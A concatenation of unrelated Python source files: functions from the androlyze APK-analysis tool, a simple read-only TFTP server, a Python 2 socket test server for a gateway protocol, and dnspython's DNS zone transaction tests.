Only interesting if `non_document`.
package_name : str, optional (default is None)
apk_hash : str, optional (default is None)
version_name : str, optional (default is None)
tag : str, optional (default is None)
script_hash : str, optional (default is None)
script_name : str, optional (default is None)
script_version : str, optional (default is None)
Notes
-----
If any of the other parameters is None it won't be used for filtering.
Returns
-------
gridfs.grid_file.GridOutCursor
If non_document and non_document_raw.
pymongo.cursor.Cursor
Otherwise
Raises
------
DatabaseLoadException
Examples
--------
>>> import androlyzelab
... from androlyze.storage.resultdb.ResultDatabaseStorage import ResultDatabaseStorage
... from androlyze.model.script.ScriptUtil import dict2json
... storage = ResultDatabaseStorage('127.0.0.1', 27017)
... res = androlyze.action_query_result_db(storage, n = 2, script_name = "ChainedApkInfos", include_fields = ["apkinfo.components.activities"])
... for r in res:
... # get dict
... # print r
... # get json
... print dict2json(r)
{
"apkinfo": {
"components": {
"activities": {
"all": [
"cn.wps.impress.test.selfvalidate.lmj.TestServiceActivity",
...
'''
# build check filter dict if some checks are given which shall be done on some attributes
if checks:
checks = MongoUtil.build_checks_filter(**checks)
# update with checks dict or {}
if 'where' in kwargs and kwargs['where'] is not None:
kwargs['where'].update(checks)
else:
kwargs['where'] = checks
non_document = kwargs.get("non_document", False)
if kwargs.get("list_ran_scripts", False):
kwargs['distinct_key'] = MongoUtil.get_attr_str(StaticResultKeys.RESOBJ_SCRIPT_META, StaticResultKeys.RESOBJ_SCRIPT_META_NAME, non_document)
return storage.get_results(**kwargs)
def action_query_import_db(storage, query_cmd, hashes = None, package_names = None, tags = None, **kwargs):
''' Returns the result of the query action.
For additional keyword-arguments see :py:meth:`.ImportStorageInterface.get_imported_apks`.
Parameters
----------
storage : ImportQueryInterface
The store to use.
query_cmd : str
The query command.
See variables prefixed with `COMMAND_QUERY_`.
hashes : iterable<str>, optional (default is None)
package_names : iterable<str>, optional (default is None)
tags : iterable<str>, optional (default is None)
order_by : str, optional (default is None)
Sort apks by key.
Returns
-------
iterable<Apk>.
If `query_cmd is` `COMMAND_QUERY_APKS`
iterable<str>
Raises
------
ValueError
If an unknown `query_cmd` has been given
'''
if not query_cmd in QUERY_COMMANDS:
raise ValueError("Unknown query cmd: %s" % query_cmd)
res = None
if query_cmd in (COMMAND_QUERY_INFOS, COMMAND_QUERY_INFOS_ALL, COMMAND_QUERY_APKS):
apks = storage.get_imported_apks(hashes, package_names, tags, **kwargs)
if query_cmd == COMMAND_QUERY_APKS:
return apks
# verbose
if query_cmd == COMMAND_QUERY_INFOS_ALL:
res = (apk.detailed_description() for apk in apks)
# non-verbose
elif query_cmd == COMMAND_QUERY_INFOS:
res = (apk.short_description() for apk in apks)
elif query_cmd == COMMAND_QUERY_PACKAGE_NAMES:
res = storage.get_apk_package_names(hashes, tags)
elif query_cmd == COMMAND_QUERY_PATHS:
res = storage.get_apk_paths(hashes, package_names, tags)
elif query_cmd in (COMMAND_QUERY_VERSIONS, COMMAND_QUERY_HASHES):
if query_cmd == COMMAND_QUERY_HASHES:
res = storage.get_apk_hashes(package_names, tags)
elif query_cmd == COMMAND_QUERY_VERSIONS:
res = storage.get_versions(hashes, package_names, tags)
return res
############################################################
#---Analyze
############################################################
ANALYZE_MODE_PARALLEL = 'parallel'
ANALYZE_MODE_NON_PARALLEL = 'non-parallel'
ANALYZE_MODE_DISTRIBUTED = 'distributed'
def action_analyze(storage, script_list, apks_or_paths = None,
mode = ANALYZE_MODE_PARALLEL, concurrency = None,
serialize_apks = True
):
'''
Analyze the `apks_or_paths` with the given `script_list`.
Parameters
----------
storage : RedundantStorage
The store to use.
script_list : list<str>
List of paths to scripts (complete filename with extension).
apks_or_paths: list<str> or list<Apk>, optional (default is None)
List of `Apk` or paths to the apks which shall be analyzed with the given scripts
If you analyze from paths the `import_date` is not set!
mode : str, optional (default is `ANALYZE_MODE_PARALLEL`)
Do an parallel analysis by default. Choose between : , , .
concurrency : int, optional (default is number of cpu cores)
Number of workers to spawn.
serialize_apks : bool, optional (default is True)
If true, serialize .apk .
Otherwise id (hash) of the apk will be send and fetched by the worker from the result db.
Be sure to import the apks to the result db first!
'''
analyzer = create_analyzer(storage, script_list, apks_or_paths, mode, concurrency, serialize_apks)
if analyzer is not None:
return run_analysis(analyzer)
def create_analyzer(storage, script_list, apks_or_paths = None,
mode = ANALYZE_MODE_PARALLEL, concurrency = None,
serialize_apks = True
):
'''
Create the analyzer only.
Parameters
----------
storage : RedundantStorage
The store to use.
script_list : list<str>
List of paths to scripts (complete filename with extension).
apks_or_paths: list<str> or list<Apk>, optional (default is None)
List of `Apk` or paths to the apks which shall be analyzed with the given scripts
If you analyze from paths the `import_date` is not set!
mode : str, optional (default is `ANALYZE_MODE_PARALLEL`)
Do an parallel analysis by default. Choose between : , , .
concurrency : int, optional (default is number of cpu cores)
Number of workers to spawn.
serialize_apks : bool, optional (default is True)
If true, serialize .apk .
Otherwise id (hash) of the apk will be send and fetched by the worker from the result db.
Be sure to import the apks to the result db first!
'''
from androlyze.model.script import ScriptUtil
from androlyze.analyze.exception import AndroScriptError
try:
# list<type<AndroScript>>
androscript_list = ScriptUtil.import_scripts(script_list)
instantiated_scripts = sorted(ScriptUtil.instantiate_scripts(androscript_list, script_paths = script_list))
if len(instantiated_scripts) == 0:
log.warn("No scripts supplied!")
return
# get hashes for `AndroScript`s so that we can set the hash directly next time we instantiate the script
script_hashes = [s.hash for s in instantiated_scripts]
min_script_needs = ScriptUtil.get_minimum_script_options(instantiated_scripts)
# log infos about scripts
clilog.info('Loaded scripts:\n%s', '\n'.join((str(s) for s in instantiated_scripts)))
log.info(ScriptUtil.androscript_options_descr(instantiated_scripts))
if apks_or_paths:
def create_analyzer():
analyzer = None
# argument for BaseAnalyzer
args = storage, androscript_list, script_hashes, min_script_needs, apks_or_paths
log.info("Mode: %s", mode)
# normal analyzer
if mode == ANALYZE_MODE_NON_PARALLEL:
from androlyze.analyze.Analyzer import Analyzer
analyzer = Analyzer(*args)
# use parallel analyzer
elif mode == ANALYZE_MODE_PARALLEL:
from androlyze.analyze.parallel.ParallelAnalyzer import ParallelAnalyzer
analyzer = ParallelAnalyzer(*args, concurrency = concurrency)
# use distributed one
elif mode == ANALYZE_MODE_DISTRIBUTED:
from androlyze.analyze.distributed.DistributedAnalyzer import DistributedAnalyzer
analyzer = DistributedAnalyzer(*args, concurrency = concurrency, serialize_apks = serialize_apks)
return analyzer
return create_analyzer()
except ApkImportError as e:
log.warn(e)
except IOError as e:
log.warn(AndroScriptError(e.filename, caused_by = e))
sys.exit(1)
except ImportError as e:
log.exception(e)
except Exception as e:
log.exception(e)
def run_analysis(analyzer):
''' Run the analysis with the `analyzer`.
Parameters
----------
analyzer : BaseAnalyzer
Returns
-------
int
Number of analyzed apks.
'''
from androlyze.analyze.exception import AndroScriptError
try:
cnt_analyzed_apks = analyzer.analyze()
if cnt_analyzed_apks == 0:
log.warn("No apk file has been analyzed !")
else:
log.warn("Analyzed %s apks", cnt_analyzed_apks)
return cnt_analyzed_apks
except AndroScriptError as e:
log.exception(e)
############################################################
#---Delete
############################################################
def action_delete_apks_import(storage, delete_apk = False, hashes = None, package_names = None, tags = None, select_whole_db = False):
''' Delete from the import storage (database and/or filesys)
Parameters
----------
storage : RedundantStorage
The store to use.
delete_apk : boolean, optional (default is False)
hashes : iterable<str>, optional (default is None)
package_names : iterable<str>, optional (default is None)
tags : iterable<str>, optional (default is None)
select_whole_db : boolean, optional (default is False)
If true, select the whole import database! Be careful!
This means we do not take `hashes`, `package_names` and `tags` into acccount!
Raises
------
ValueError
'''
try:
apks = None
if select_whole_db:
apks = action_query_import_db(storage, COMMAND_QUERY_APKS, hashes, package_names, tags)
# If don't delete whole database!!!!!
elif len(Util.filter_not_none((hashes, package_names, tags))) > 0:
apks = action_query_import_db(storage, COMMAND_QUERY_APKS, hashes, package_names, tags)
else:
raise ValueError('''Neither hashes nor package names nor tags specified!
If you wan't do use the whole database, set `select_whole_db` to true.
''')
# use list, otherwise we have duplicates due to the generator
for apk in list(apks):
if delete_apk:
clilog.info("Will delete from database and file system: \n%s ", apk.detailed_description())
else:
clilog.info("Will delete %s from database: %s ", apk.short_description(), storage.import_db_storage)
storage.delete_entry_for_apk(apk, delete_apk)
except StorageException as e:
log.warn(e)
def action_delete_apks_res(storage,
where = None, non_document = False, whole_db = False, **kwargs):
'''
Delete some results from the database.
Parameters
----------
storage : RedundantStorage
The store to use.
where : dict, optional (default is {})
A filter.
non_document : bool, optional (default is False)
Remove from gridfs.
whole_db : bool, optional (default is False)
Other Parameters
----------------
package_name : str, optional (default is None)
apk_hash : str, optional (default is None)
version_name : str, optional (default is None)
tag : str, optional (default is None)
script_hash : str, optional (default is None)
script_name : str, optional (default is None)
script_version : str, optional (default is None)
Notes
-----
If any of the other parameters is None it won't be used for filtering.
They may will also overwrite the other ones.
Returns
-------
int
Number of documents which have been removed.
If not `whole_db`
None
'''
if whole_db:
storage.erase_whole_db()
return None
return storage.delete_results(where, non_document, **kwargs)
############################################################
#---Sync
############################################################
def action_sync_fs(storage, continue_func = lambda _ : True, wait_for_db = True,
# progess
synced_entries = None, total_sync_entries = None):
'''
Sync file system with result database.
Parameters
----------
storage : RedundantStorage
The store to use.
continue_func : int -> bool, optional (defauls is True)
This function will be executed before the actual sync starts with the nomber of total items to fetch.
The function determines via return value if the action shall be done.
wait_for_db : bool, optional (default is True)
Wait until data could be fetched from db.
synced_entries : multiprocessing.Value<int>, optional (default is None)
If supplied store number of already synces entries.
total_sync_entries : multiprocessing.Value<int>, optional (default is None)
If supplied store number of total entries to sync.
Returns
-------
int
Number of entries to sync/synced.
'''
fs_storage = storage.fs_storage
rds = storage.result_db_storage
# get id' for non-gridfs
document_ids = rds.get_ids(non_document = False)
# get id' for gridfs
gridfs_ids = rds.get_ids(non_document = True)
# total number of entries
total_entries = len(document_ids) + len(gridfs_ids)
# check if really sync wanted
if continue_func(total_entries):
# do sync
fs_storage.fetch_results_from_mongodb(rds, zip(document_ids, repeat(False)) + zip(gridfs_ids, repeat(True)),
nice_progess = True, wait_for_db = wait_for_db,
synced_entries = synced_entries, total_sync_entries = total_sync_entries)
return total_entries
|
tftp.py
|
# import click
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack, pack
from threading import Thread
from zipfile import ZipFile
import io
import os
from piman import logger
"""
This code is modified following Prof. Reed suggestion
"""
"""
The TFTPServer class encapsulates the methods required for running a simple TFTP server that handles only read requests
The server is initialized with a data directory, a port, as well as a connection address
Data directory, port and connection address is specified in the configuration file
(note: sudo must be used if using port 69)
"""
class TFTPServer:
RRQ_OPCODE = 1
DATA_OPCODE = 3
ACK_OPCODE = 4
ERROR_OPCODE = 5
# TFTP data packets consist of a 2-byte opcode, 2-byte block number, and up to 512-byte data portion
# Although we could minimize since our server is solely getting RRQ and Ack packets we could have set
# the buffer to a more optimized value (i.e. filenames on Mac OSX can have up to 256 characters so we
# could limit the buffer to the max size of a RRQ packet) but for better practice it's been set to the
# max data packet length in TFTP
BUFFER_SIZE = 516
# ctor for setting configurable attributes
def __init__(self, data_dir, tftp_port, connection_address):
self.data_dir = data_dir
self.tftp_port = tftp_port
self.connection_address = connection_address
# opens install/boot in zipfile
def res_open(self, name):
zipfile = os.path.dirname(os.path.dirname(__file__))
fd = None
try:
with ZipFile(zipfile) as z:
fd = z.open("install/boot/" + name)
except KeyError:
logger.error("{}: key error - looking in filesystem next".format(name))
pass # we'll try looking in the filesystem next
if not fd:
fd = open("{}/{}".format(self.data_dir, name), "rb")
if 'cmdline.txt' in name and fd:
# we need to fixup the master address
content = fd.read()
fd.close()
fd = io.BytesIO(content.replace(b'MASTER', self.connection_address.encode()))
return fd
"""
Begins running the server thread
"""
def start(self):
self.server_socket = socket(AF_INET, SOCK_DGRAM)
# We can specify a specific address when running the server (defaults to '')
logger.info("connecting to {}:{}".format(self.connection_address, self.tftp_port))
self.server_socket.bind((self.connection_address, self.tftp_port))
logger.info("serving files from {} on port {}".format(self.data_dir, self.tftp_port))
self.tftp_thread = Thread(target=self.__process_requests, name="tftpd")
self.tftp_thread.start()
def stop(self):
self.server_socket.close()
"""
This code is responsible for handling requests (both valid and invalid) as well as ensuring data is transferred
properly and reliably.
"""
def __process_requests(self):
# this while loop keeps our server running also accounting for ensuring the initial
# data packet is retrieved by the host
# accepts RRQ's for files and starts a thread to proccess it
logger.info("TFTP waiting for request")
while True:
pkt, addr = self.server_socket.recvfrom(self.BUFFER_SIZE)
t1 = Thread(
target=self.__create_thread_and_process_requests, args=(pkt, addr))
t1.daemon = True
t1.start()
"""
This code is responsible for handling requests. It starts a new socket with an ephemeral port
for communication to the client. If no response is heard after 10 seconds, the socket is closed and function ends.
"""
def __create_thread_and_process_requests(self, pkt, addr):
# initial block number and variable for filename
block_number = 0
filename = ''
# prepare the UDP socket
client_dedicated_sock = socket(AF_INET, SOCK_DGRAM)
# bind to 0 for an ephemeral port
client_dedicated_sock.bind((self.connection_address, 0))
# set timeout for the socket
client_dedicated_sock.settimeout(10)
# RRQ is a series of strings, the first two being the filename
# and mode but there may also be options. see RFC 2347.
#
# we skip the first 2 bytes (the opcode) and split on b'\0'
# since the strings are null terminated.
#
# because b'\0' is at the end of all strings split will always
# give us an extra empty string at the end, so skip it with [:-1]
strings_in_RRQ = pkt[2:].split(b"\0")[:-1]
logger.info("got {} from {}".format(strings_in_RRQ, addr))
filename = strings_in_RRQ[0]
# opens the file once for the socket, opening multiple times causes tftp to be slow
try:
transfer_file = self.res_open(strings_in_RRQ[0].decode())
while True:
# the first two bytes of all TFTP packets is the opcode, so we can
# extract that here. the '!' is for big endian, and 'H' is to say it is an integer
[opcode] = unpack("!H", pkt[0:2])
if opcode == TFTPServer.RRQ_OPCODE:
# set the opcode for the packet we are sending
transfer_opcode = pack("!H", TFTPServer.DATA_OPCODE)
# read up to the appropriate 512 bytes of data
data = transfer_file.read(512)
# if data is received increment block number, contruct the packet, and send it
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# ACK received, so we can now read the next block, if it doesn't match resend the previous block of data
elif opcode == TFTPServer.ACK_OPCODE:
[acked_block] = unpack("!H", pkt[2:4])
# block number matches, the block sent was successfully received
if acked_block == block_number:
data = transfer_file.read(512)
# if data read, increment block number, construct packet, and send it on the socket
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# if no data was read, read returns b'', then EOF was reached and download complete
else:
logger.warning('download complete, closing socket')
client_dedicated_sock.close()
break
# if the block number doesn't match, means data sent was not received
# here you can just resend the data you already read because, no need for seek or another read
# because you already read it and it was not received, doing seek or read would slow down tftp
elif block_number != acked_block:
# decrement block number
block_number = block_number - 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 21)
error_message = b"incorrect TID\0"
logger.error("incorrect TID")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
else:
# form an error packet and send it to the invalid TID
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 20)
error_message = b"illegal operation specified\0"
logger.error("illegal operation specified")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
# listen for a client response for 10 seconds
# close everything and terminate if no response
try:
pkt, addr = client_dedicated_sock.recvfrom(
self.BUFFER_SIZE)
except:
logger.error("Socket Timed Out")
client_dedicated_sock.close()
logger.error('closed socket')
break
except FileNotFoundError:
# send an error packet to the requesting host
error_opcode = pack("!H", TFTPServer.ERROR_OPCODE)
error_code = pack("!H", 17)
error_message = b"No such file within the directory\0"
logger.error("No such file within the directory")
packet = error_opcode + error_code + error_message
client_dedicated_sock.sendto(packet, addr)
client_dedicated_sock.close()
def join(self):
self.tftp_thread.join()
def do_tftpd(data_dir, connection_address, tftp_port):
""" this is a simple TFTP server that will listen on the specified
port and serve data rooted at the specified data. only read
requests are supported for security reasons.
"""
logger.warning("Starting TFTP...")
srvr = TFTPServer(data_dir, tftp_port, connection_address)
srvr.start()
srvr.join()
logger.warning("TFTP is terminating")
if __name__ == "__main__":
do_tftpd()
|
server_get_scene_test.py
|
import socket
import time
import sys
import random
import math
import threading
HOST = ''
PORT = 8089
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.bind( (HOST, PORT) )
except socket.error as msg:
print 'Bind failed. Error Code: ' + str(msg[0]) + 'Message' + msg[1]
sys.exit()
skt.listen(10)
def work(skt):
msg_header = 'AADD'
msg_stamp = '\x00\x00\x00\x00'
msg_id_gw = '2016A011'
msg_id_dev = '00000000'
msg_devtype = '\x00\x00'
msg_auth_ack_datatype = '\x3e\x00'
msg_auth_ack = msg_header+msg_stamp+msg_id_gw+msg_id_dev+msg_devtype+msg_auth_ack_datatype+'\x00\x08'+msg_id_gw
dev_mac_base = 1
sce_id_major_base = 1
sce_id_minor_base = 1
#Authorization
length = skt.send(msg_auth_ack)
print length
msg_bak = skt.recv(1024)
print msg_bak
while(True):
conn, addr = skt.accept()
print 'connection established from : ' + str(addr)
#work_thread = threading.Thread(target = work, args = (conn,))
#work_thread.start()
msg_header = 'AADD'
msg_stamp = '\x00\x00\x00\x00'
msg_id_gw = '2016A011'
msg_id_dev = '00000000'
msg_devtype = '\x00\x00'
msg_auth_ack_datatype = '\x3e\x00'
msg_auth_ack = msg_header+msg_stamp+msg_id_gw+msg_id_dev+msg_devtype+msg_auth_ack_datatype+'\x00\x08'+msg_id_gw
dev_mac_base = 1
sce_id_major_base = 1
sce_id_minor_base = 1
#Authorization
length = conn.send(msg_auth_ack)
print length
msg_bak = conn.recv(1024)
print msg_bak
#scene get all
sce_id_major = '0'*8
sce_id_minor = '0'*8
body_len='\x00\x10'
msg_get_scene = msg_header+msg_stamp+msg_id_gw+msg_id_dev+msg_devtype+'\x0e\x00'+ body_len + sce_id_major +sce_id_minor
#print('msg = ' + msg_set_scene)
wlength = conn.send(msg_get_scene)
print length
while(True):
msg_bak = conn.recv(200000)
print len(msg_bak)
time.sleep(0.02)
#conn.close()
#skt.close()
#break
time.sleep(500)
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text('example'), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text('content', None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b'content',)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
expected = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text('nonexistent', None))
content = dns.name.from_text('content', None)
content2 = dns.name.from_text('content2', None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'new-content')
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'new-content')
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text('foo', None)
rdataset = dns.rdataset.from_text('in', 'a', 300,
'10.0.0.1', '10.0.0.2')
rdata1 = dns.rdata.from_text('in', 'a', '10.0.0.3')
rdata2 = dns.rdata.from_text('in', 'a', '10.0.0.4')
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text('foo', 30, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == \
expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) \
is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text('bar', 300, 'in', 'txt', 'bar')
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text('foo', None)
rdata = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(foo, 0x100000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, 'hi')
with pytest.raises(TypeError):
txn.add(foo, 'hi')
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'SOA',
'. . 1 2 3 4 5')
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text('bar.foo', None))
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(dns.name.from_text('ns3', None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.rollback()
assert zone.get_node('bar.foo') is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.commit()
assert zone.get_node('bar.foo') is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text('bar.foo', None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get('bar.foo', 'in', 'mx')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('unknown.bar.foo', None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None), 'txt')
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('foo.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2', 'ns3')
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text('ns1', None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text('ns99', None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
a100 = dns.name.from_text('a100', None)
a101 = dns.name.from_text('a101', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text('ns1', None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
